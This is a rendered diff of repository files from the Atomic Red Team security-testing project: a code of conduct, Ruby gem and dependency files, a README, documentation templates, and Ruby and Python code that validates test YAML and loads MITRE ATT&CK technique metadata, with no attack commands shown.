* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter if its privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://atomicredteam.io/slack)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://atomicredteam.io/slack)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
+2
View File
@@ -0,0 +1,2 @@
source "https://rubygems.org"
gemspec
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.0)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.8.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.2.0)
commonmarker (~> 0.14)
jekyll (>= 3.0, < 4.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.4.1)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.16.1
+44 -28
View File
@@ -1,45 +1,61 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1790-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
## Philosophy
Atomic Red Team is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.
## Get started
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
The best test is the one you actually run.
## Learn more
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
See: https://atomicredteam.io
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
## Having trouble?
To stay up to date on all things Atomic Red Team, sign up for the Atomic Newsletter: https://redcanary.com/atomic-newsletter/
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
## Contribute to Atomic Red Team
## Getting Started
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
- Linux [Tests](atomics/linux-index.md) and [Matrix](atomics/linux-matrix.md)
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
* [Doing more with Atomic Red Team](#doing-more-with-atomic-red-team)
* [Using the Atomic Red Team Ruby API](#using-the-atomic-red-team-ruby-api)
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
- Join our [Slack workspace](https://atomicredteam.io/slack) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
- Contribute to linux atomics quickly from GitHub Codespaces. For more details, click [here](https://github.com/redcanaryco/atomic-red-team/wiki/Github-Codespaces)
## Code of Conduct
[![Open in GitHub Codespaces](https://github.com/codespaces/badge.svg)](https://codespaces.new/redcanaryco/atomic-red-team)
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
+15
View File
@@ -0,0 +1,15 @@
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
s.files = %w(atomic-red-team.gemspec) + Dir['{atomic_red_team}/**/*', '*.md', 'bin/*']
s.test_files = Dir['spec/**/*']
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
View File
@@ -0,0 +1,49 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<% title = "Atomic Test ##{test_number+1} - #{test['name']}" %>
- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
<% end %>
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<br/>
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<br/>
<%- end -%>
-75
View File
@@ -1,75 +0,0 @@
# {{ technique['identifier'] }} - {{ technique['name'] }}
## Description from ATT&CK
{% for desc_line in attack_description_lines -%}
> {{ desc_line.strip() }}
{% endfor %}
[Source](https://attack.mitre.org/techniques/{{ technique['identifier'] | attack_url_identifier }})
## Atomic Tests
{% for test in atomic_yaml['atomic_tests'] -%}
{% set title = "Atomic Test #" ~ loop.index ~ ": " ~ test['name'] -%}
- [{{ title }}](#{{ title | anchor }})
{% endfor %}
{% for test in atomic_yaml['atomic_tests'] -%}
### Atomic Test #{{ loop.index }}: {{ test['name'] }}
{{ test['description'].strip() }}
**Supported Platforms:** {{ test['supported_platforms'] | platform_list }}
**auto_generated_guid:** `{{ test['auto_generated_guid'] }}`
{% if test.get('input_arguments') -%}
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
{% for arg_name, arg_options in test['input_arguments'].items() -%}
| {{ arg_name | cleanup }} | {{ arg_options.get('description') | cleanup }} | {{ arg_options.get('type') | cleanup }} | {{ arg_options.get('default') | cleanup }}|
{% endfor -%}
{% endif -%}
{% if test['executor']['name'] == 'manual' -%}
#### Attack Commands: Run it with these steps! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
{{ test['executor']['steps'] }}
{% else -%}
#### Attack Commands: Run with `{{ test['executor']['name'] }}`!{% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin){% endif %}
```{{ test['executor']['name'] | language }}
{{ test['executor'].get('command', '').strip() }}
```
{% endif %}
{% if test['executor'].get('cleanup_command') is not none -%}
#### Cleanup Commands
```{{ test['executor']['name'] | language }}
{{ test['executor']['cleanup_command'].strip() }}
```
{% endif -%}
{% if test.get('dependencies') -%}
{% set dependency_executor = test.get('dependency_executor_name') or test['executor']['name'] -%}
#### Dependencies: Run with `{{ dependency_executor }}`!
{% for dep in test['dependencies'] %}
##### Description: {{ dep['description'].strip() }}
###### Check Prereq Commands
```{{ dependency_executor | language }}
{{ dep['prereq_command'].strip() }}
```
###### Get Prereq Commands
```{{ dependency_executor | language }}
{{ dep['get_prereq_command'].strip() }}
```
{% endfor %}
{% endif -%}
{% endfor -%}
@@ -0,0 +1 @@
TBD
+173
View File
@@ -0,0 +1,173 @@
require 'yaml'
require 'erb'
require 'attack_api'
class AtomicRedTeam
ATTACK_API = Attack.new
ATOMICS_DIRECTORY = "#{File.dirname(File.dirname(__FILE__))}/atomics"
# TODO- should these all be relative URLs?
ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"
#
# Returns a list of paths that contain Atomic Tests
#
def atomic_test_paths
Dir["#{ATOMICS_DIRECTORY}/T*/T*.yaml"].sort
end
#
# Returns a list of Atomic Tests in Atomic Red Team (as Hashes from source YAML)
#
def atomic_tests
@atomic_tests ||= atomic_test_paths.collect do |path|
atomic_yaml = YAML.load(File.read path)
atomic_yaml['atomic_yaml_path'] = path
atomic_yaml
end
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique(technique_or_technique_identifier)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
atomic_tests.find do |atomic_yaml|
atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
end.to_h.fetch('atomic_tests', [])
end
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests.
#
def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
def validate_atomic_yaml!(yaml)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
raise('`atomic_tests` element is required') unless yaml.has_key?('atomic_tests')
raise('`atomic_tests` element must be an array') unless yaml['atomic_tests'].is_a?(Array)
raise('`atomic_tests` element is empty - you have no tests') unless yaml['atomic_tests'].count > 0
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element must be a string") unless arg['description'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element is required") unless arg.has_key?('type')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be a string") unless arg['type'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be lowercased and underscored (was #{arg['type']})") unless arg['type'] =~ /[a-z_]+/
# TODO: determine if we think default values are required for EVERY input argument
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element is required") unless arg.has_key?('default')
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element must be a string (was a #{arg['default'].class.name})") unless arg['default'].is_a?(String)
end
raise("`atomic_tests[#{i}].executor` element is required") unless atomic.has_key?('executor')
executor = atomic['executor']
raise("`atomic_tests[#{i}].executor.name` element is required") unless executor.has_key?('name')
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['command'],
string_description: "atomic_tests[#{i}].executor.command"
else
raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}")
end
validate_no_todos!(atomic, path: "atomic_tests[#{i}]")
end
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
#
def validate_input_args_vs_string!(input_args:, string:, string_description:)
input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten
input_args_in_string_and_not_specced = input_args_in_string - input_args
if input_args_in_string_and_not_specced.count > 0
raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments")
end
input_args_in_spec_not_string = input_args - input_args_in_string
if input_args_in_string_and_not_specced.count > 0
raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command")
end
end
#
# Recursively validates that the hash (or something) doesn't contain a TODO
#
def validate_no_todos!(hashish, path:)
if hashish.is_a? String
raise "`#{path}` contains a TODO" if hashish.include? 'TODO'
elsif hashish.is_a? Array
hashish.each_with_index do |item, i|
validate_no_todos! item, path: "#{path}[#{i}]"
end
elsif hashish.is_a? Hash
hashish.each do |k, v|
validate_no_todos! v, path: "#{path}.#{k}"
end
end
end
end
+26
View File
@@ -0,0 +1,26 @@
---
attack_technique: TODO
display_name: TODO
atomic_tests:
- name: TODO
description: |
TODO
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: todo
default: TODO
executor:
name: command_prompt
command: |
TODO
-150
View File
@@ -1,150 +0,0 @@
import json
import re
from collections import defaultdict
from pathlib import Path
from typing import Pattern
from atomic_red_team.common import base_path
PlatformFilter = str | Pattern[str]
class Attack:
"""Loads MITRE ATT&CK technique metadata used by documentation generation."""
def __init__(self, attack_file: str | Path | None = None):
self.attack_file = (
Path(attack_file)
if attack_file
else Path(base_path) / "atomic_red_team" / "enterprise-attack.json"
)
self._techniques: list[dict] | None = None
self._techniques_by_id: dict[str, dict] | None = None
def ordered_tactics(self) -> list[str]:
return [
"reconnaissance",
"resource-development",
"initial-access",
"execution",
"persistence",
"privilege-escalation",
"stealth",
"defense-impairment",
"credential-access",
"discovery",
"lateral-movement",
"collection",
"command-and-control",
"exfiltration",
"impact",
]
def technique_identifier_for_technique(self, technique: dict) -> str:
reference = next(
ref
for ref in technique.get("external_references", [])
if ref.get("source_name") == "mitre-attack"
)
return reference["external_id"].upper()
def technique_info(self, technique_id: str) -> dict | None:
return self.techniques_by_id.get(technique_id.upper())
def ordered_tactic_to_technique_matrix(
self,
only_platform: PlatformFilter = ".*",
) -> list[list[dict | None]]:
techniques_by_tactic = self.techniques_by_tactic(only_platform=only_platform)
tactic_order = [
techniques_by_tactic[tactic] for tactic in self.ordered_tactics()
]
max_techniques = max(
(len(techniques) for techniques in tactic_order), default=0
)
if max_techniques == 0:
return []
for techniques in tactic_order:
techniques.extend([None] * (max_techniques - len(techniques)))
return [list(row) for row in zip(*tactic_order)]
def techniques_by_tactic(
self,
only_platform: PlatformFilter = ".*",
) -> dict[str, list[dict]]:
result: dict[str, list[dict]] = defaultdict(list)
for technique in self.techniques:
platforms = technique.get("x_mitre_platforms")
if not platforms:
continue
if not any(
_matches_platform(platform, only_platform) for platform in platforms
):
continue
if technique.get("revoked", False) or technique.get(
"x_mitre_deprecated", False
):
continue
for tactic in technique.get("kill_chain_phases", []):
if tactic.get("kill_chain_name") == "mitre-attack":
result[tactic["phase_name"]].append(technique)
return result
@property
def techniques(self) -> list[dict]:
if self._techniques is None:
raw = [
obj
for obj in json.loads(self.attack_file.read_text())["objects"]
if obj.get("type") == "attack-pattern"
]
id_to_name = {
_attack_id(obj): obj["name"]
for obj in raw
if _attack_id(obj) is not None
}
techniques = []
for obj in raw:
tid = _attack_id(obj)
if tid is None:
continue
t = dict(obj)
if "." in tid:
parent_name = id_to_name.get(tid.split(".")[0])
if parent_name:
t["name"] = f"{parent_name}: {t['name']}"
techniques.append(t)
